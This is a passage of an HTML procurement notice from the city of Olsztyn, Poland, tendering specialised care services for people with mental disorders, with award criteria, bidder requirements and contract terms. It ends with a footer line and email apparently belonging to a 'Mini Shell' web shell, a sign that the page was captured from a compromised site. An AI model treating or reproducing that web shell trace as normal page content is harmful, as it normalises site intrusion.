ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie przez Wykonawcę osób (opiekunek) świadczących specjalistyczne usługi opiekuńcze na podstawie umowy o pracę w wymiarze co najmniej ¼ etatu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Stawka godzinowa brutto dla osób (opiekunek) świadczących specjalistyczne usługi opiekuńcze</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.O Udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu<br/>2) spełniają warunki udziału w postępowaniu określone przez zamawiającego w ogłoszeniu o zamówieniu i SWZ. <br/>2.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>1)zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia warunków w powyższym zakresie. <br/>2)uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunków w powyższym zakresie. <br/>3)sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia warunków w powyższym zakresie. <br/>4)zdolności technicznej lub zawodowej: <br/>a)Wykonawca spełni warunek dotyczący zdolności zawodowej w zakresie doświadczenia-jeżeli wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, wykonał co najmniej jedną usługę w zakresie świadczenia specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi o wartości co najmniej 500 000 zł brutto przy czym, w przypadku usług w trakcie realizacji, wymóg odnoszący się do wartości 500 000 zł brutto dotyczy części usługi zrealizowanej do upływu terminu składania ofert w niniejszym postępowaniu (nie wartości całego zamówienia). Przez jedną usługę Zamawiający rozumie usługę świadczoną na podstawie jednej umowy dla jednego Zamawiającego. oraz załączy dowody określające, czy usługi te zostały wykonane lub są wykonywane należycie.<br/>b)Wykonawca spełni warunek, jeżeli wykaże dysponowanie osobami kierowanymi do realizacji zamówienia spełniającymi wymogi określone w Rozporządzeniu Ministra Polityki Społecznej w sprawie specjalistycznych usług opiekuńczych (Dz.U. 2023, poz.395) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.Oświadczenie wykonawcy,<br/>w zakresie art. 108 ust.1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego<br/>2007 r. o ochronie konkurencji i konsumentów (Dz.U. z dnia 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej załącznik nr 9 do SWZ<br/>-w przypadku, gdy w postępowaniu zostanie złożona tylko jedna oferta, Zamawiający odstąpi od wezwania Wykonawcy do złożenia<br/>oświadczenia w zakresie określonym w art. 108 ust. 1 pkt. 5 ustawy, ponieważ zgodnie z opinią Urzędu Zamówień Publicznych<br/>wskazana powyżej podstawa wykluczenia ma zastosowanie tylko w przypadku złożenia co najmniej dwóch ofert, co oznacza, że<br/>wskazany powyżej przepis nie daje podstaw do wykluczenia Wykonawcy z postępowania, w przypadku, gdy złożono tylko jedną ofertę. W związku z powyższym w świetle celu, jakim jest przeciwdziałanie zakłóceniu konkurencji w postępowaniu przez grupę kapitałową, Zamawiający odstąpi od wezwania Wykonawcy do złożenia w/w oświadczenia w przypadku, gdy zostanie złożona tylko jedna oferta, ponieważ w takiej sytuacji staje się ono zbędne.<br/>2.Odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust.1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji; przedmiotowy odpis dotyczący również podmiotu udostępniającego zasoby lub<br/>podwykonawcy, wykonawca będzie zobowiązany złożyć w przypadku gdy powołuje się na zasoby podmiotu w celu potwierdzenia spełniania warunków udziału w postępowaniu lub w ofercie wskazał podwykonawcę.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu,<br/>dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane należycie oraz załączeniem dowodów określających czy te usługi zostały wykonane lub<br/>są wykonywane należycie. Dowodami, o których mowa powyżej są:<br/>-referencje,<br/>-inne dokumenty wystawione przed podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane,<br/>-oświadczenie wykonawcy - jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów.<br/>W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinno być wydane nie wcześniej niż 3 miesiące przez upływem terminu składania ofert załącznik nr 8 do SWZ<br/>2.Wykaz osób skierowanych przez wykonawcę do realizacji przedmiotowego zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami. W wykazie tym winna znaleźć się osoba odpowiedzialna za kontrolę i nadzór procesu realizacji specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi na terenie Olsztyna załącznik nr 10 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.Każdy Wykonawca wraz z ofertą składa aktualne na dzień składania ofert oświadczenia:<br/>1.1.o spełnieniu warunków udziału w postępowaniu, aktualne na dzień składania ofert – załącznik nr 4 do SWZ<br/>Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania spełniania warunków udziału w<br/>postępowaniu-uzupełnia oświadczenie we wskazanym miejscu<br/>1.2.o braku podstaw do wykluczenia z postępowania, aktualne na dzień składania ofert – załącznik nr 3 do SWZ<br/>Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania spełniania warunków udziału w postępowaniu - uzupełnia oświadczenie we wskazanym miejscu.<br/>Informacje zawarte w oświadczeniach, o którym mowa w pkt. 1 stanowią wstępne potwierdzenie, że Wykonawca nie<br/>podlega wykluczeniu oraz spełnia warunki udziału<br/>w postępowaniu.<br/>Informacje zawarte w oświadczeniach, o którym mowa w ust.1 pkt 1 i 2 stanowią wstępne potwierdzenie, że Wykonawca nie<br/>podlega wykluczeniu oraz spełnia warunki udziału<br/>w postępowaniu.<br/>2.Pełnomocnictwo złożone w formie oryginału lub kopii poświadczonej notarialnie.<br/>W przypadku podpisywania oferty przez osoby nie wymienione w odpisie z właściwego rejestru – pełnomocnictwo do<br/>podpisania oferty lub podpisania oferty i zawarcia umowy złożone wraz z ofertą w oryginale w postaci elektronicznej i<br/>opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez osoby udzielające<br/>pełnomocnictw, albo elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem kwalifikowanym podpisem<br/>elektronicznym podpisem zaufanym lub podpisem osobistym.<br/>3.W przypadku podmiotów występujących wspólnie – pełnomocnictwo podpisane przez upoważnionych przedstawicieli<br/>każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 58 Ustawy Pzp),<br/>złożone wraz z ofertą w oryginale w postaci elektronicznej i opatrzone kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym przez osoby udzielające pełnomocnictw, albo elektronicznej kopii dokumentu<br/>poświadczonej za zgodność z oryginałem kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym.<br/>4.Zobowiązanie innego podmiotu, na zasobach którego polega Wykonawca, do oddania do dyspozycji Wykonawcy<br/>niezbędnych zasobów na potrzeby realizacji zamówienia złożone wraz z ofertą w postaci elektronicznej opatrzone<br/>kwalifikowanym podpisem elektronicznym podpisem zaufanym lub podpisem osobistym przez osobę/osoby uprawnione do<br/>reprezentacji tego podmiotu, albo elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem kwalifikowanym<br/>podpisem elektronicznym podpisem zaufanym lub podpisem osobistym – załącznik nr 5 do SWZ<br/>Poświadczenia zgodności elektronicznej kopii dokumentu z dokumentem w postaci papierowej może dokonać również<br/>notariusz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty Załącznik nr 6 do SWZ<br/>2.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>rozdziale VIII ust. 1 SWZ składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnienie warunków udziału<br/>w zakresie, w jakim każdy z Wykonawców wykazuje spełnienie warunków udziału<br/>w postępowaniu.<br/>3.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane wykonają poszczególni Wykonawcy.<br/>4.Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1)Zamawiający dopuszcza zastosowanie zmienionej stawki podatku VAT, jeżeli w trakcie obowiązywania umowy nastąpi<br/>zmiana przepisów w tym zakresie. Zamawiający zobowiązuje się do uiszczenia opłaty z zastosowaniem stawki<br/>obowiązującej na dzień wystawienia faktury VAT. Koszty związane z wprowadzeniem podatku VAT pokrywa Zamawiający<br/>2)W przypadku wykorzystania przed terminem końcowym wskazanym w umowie, środków finansowych przewidzianych na<br/>wykonanie zadania o wartości co najmniej 90 % kwoty określonej w umowie z tytułu realizacji zamówienia, w celu<br/>zachowania przez Zamawiającego ciągłości w zakresie świadczenia specjalistycznych usług opiekuńczych dla osób z<br/>zaburzeniami psychicznymi objętych pomocą Miejskiego Ośrodka Pomocy Społecznej w Olsztynie koniecznych dla<br/>sprawnego wykonywania usług, Zamawiający przewiduje zwiększenie kwoty przeznaczonej na realizację zamówienia. Oznacza to, że Zamawiający będzie uprawniony do zwiększenia ilości godzin specjalistycznych usług opiekuńczych w<br/>stosunku do ilości szacunkowej wskazanej w SWZ, odpowiednio do potrzeb Zamawiającego skalkulowanych do terminu<br/>końcowego umowy wraz z podniesieniem wartości przedmiotowej umowy do wysokości przyznanej dotacji z budżetu<br/>Wojewody Warmińsko-Mazurskiego.<br/>3)Zamawiający dopuszcza jednokrotną waloryzację wynagrodzenia Wykonawcy nie wcześniej niż z upływem sześciu<br/>miesięcy od dnia rozpoczęcia realizacji zamówienia wynikającego z treści umowy, jeżeli wystąpiła zmiana ceny materiałów<br/>lub kosztów związanych z realizacją zamówienia. Przez zmianę ceny materiałów lub kosztów rozumie się wzrost<br/>odpowiednio cen lub kosztów, jak i ich obniżenie, względem ceny lub kosztu przyjętych w celu ustalenia wynagrodzenia<br/>wykonawcy zawartego w ofercie. Zamawiający jest uprawniony do żądania od Wykonawcy szczegółowego wskazania cen<br/>lub kosztów jakie zostały uwzględnione i przyjęte do ustalenia wynagrodzenia za realizację zamówienia w przypadku<br/>złożenia wniosku o waloryzację wynagrodzenia.<br/>4) Zmiana wysokości wynagrodzenia Wykonawcy jest dopuszczalna wówczas gdy zgodnie z Komunikatem Prezesa<br/>Głównego Urzędu Statystycznego w sprawie wskaźnika cen towarów i usług konsumpcyjnych w I półroczu 2023r.,wskaźnik<br/>cen towarów i usług konsumpcyjnych w I półroczu 2023 roku w stosunku do I półrocza 2022r. przekroczy 10% , a nadto<br/>Wykonawca wykaże, że poziom zmiany ceny lub kosztów przyjętych do ustalenia wynagrodzenia wykonawcy zawarty w<br/>ofercie, za który Zamawiający przyjmuje dzień złożenia oferty Wykonawcy, na dzień składania wniosku o waloryzację<br/>wynagrodzenia przekroczył 5 %.<br/>5)Podstawą do zmiany wysokości wynagrodzenia Wykonawcy jest wykazanie przesłanek do złożenia wniosku określonych<br/>wyżej oraz złożenie pisemnego szczegółowo umotywowanego wniosku wraz z kopiami niezbędnych rachunków, faktur,<br/>umów i innych dokumentów.<br/>6)Zamawiający nie uwzględnienia przy zmianie wysokości wynagrodzenia tych kosztów<br/>i cen, które na dzień składania oferty były powszechnie znane tj: wynikały<br/>z aktów prawnych opublikowanych w publicznych publikatorach takich jak Dziennik Ustaw, Monitor Polski, Dziennik<br/>Urzędowy dla danego województwa przed dniem złożenia oferty, a obowiązujących w trakcie realizacji zamówienia.<br/>7)Zmiana wysokości wynagrodzenia Wykonawcy wskutek waloryzacji nie może przekroczyć 5 % wartości umowy określonej<br/>w § 4 ust. 4 Umowy .<br/>8)Zamawiający zastrzega, iż uwzględnienie wniosku o waloryzację wynagrodzenia wymaga zabezpieczenia środków finansowych w planie finansowym Zamawiającego na ten cel, a zatem przewidywany termin rozpatrywania wniosku określa<br/>się na okres co najmniej 2 miesięcy. Zamawiający dopuszcza także prowadzenie negocjacji co do ostatecznej kwoty wynagrodzenia, przy zachowaniu warunków określonych powyżej (pkt 7 i pkt 4) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.olsztyn.eu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-30 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W prowadzonym postępowaniu Zamawiający:<br/>1) nie dopuszcza składania ofert częściowych. Zamawiający nie dokonał podziału na części<br/>ponieważ przedmiot zamówienia jest niepodzielny. Przedmiot zamówienia stanowi niepodzielną całość i wskazane jest aby<br/>wykonywał go jeden Wykonawca. Realizacja zadania przez jednego Wykonawcę umożliwi uzyskanie ujednoliconej<br/>standaryzacji usług oraz jasno określonej odpowiedzialności Wykonawcy za świadczoną usługę.<br/>2) nie dopuszcza składania ofert wariantowych oraz w postaci katalogów elektronicznych;<br/>3) nie przewiduje udzielania zamówień o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp;<br/>4) nie przewiduje aukcji elektronicznej, o której mowa w art. 308 ustawy Pzp;<br/>5) nie przewiduje zawarcia umowy ramowej;<br/>6) nie przewiduje udzielania zaliczek na poczet wykonania zamówienia (art. 442 ustawy Pzp);<br/>7) Zamawiający nie zastrzega możliwości ubiegania się o udzielenie zamówienia wyłącznie przez wykonawców, o których<br/>mowa w art. 94 Pzp.

Creat By MiNi SheLL
Email: jattceo@gmail.com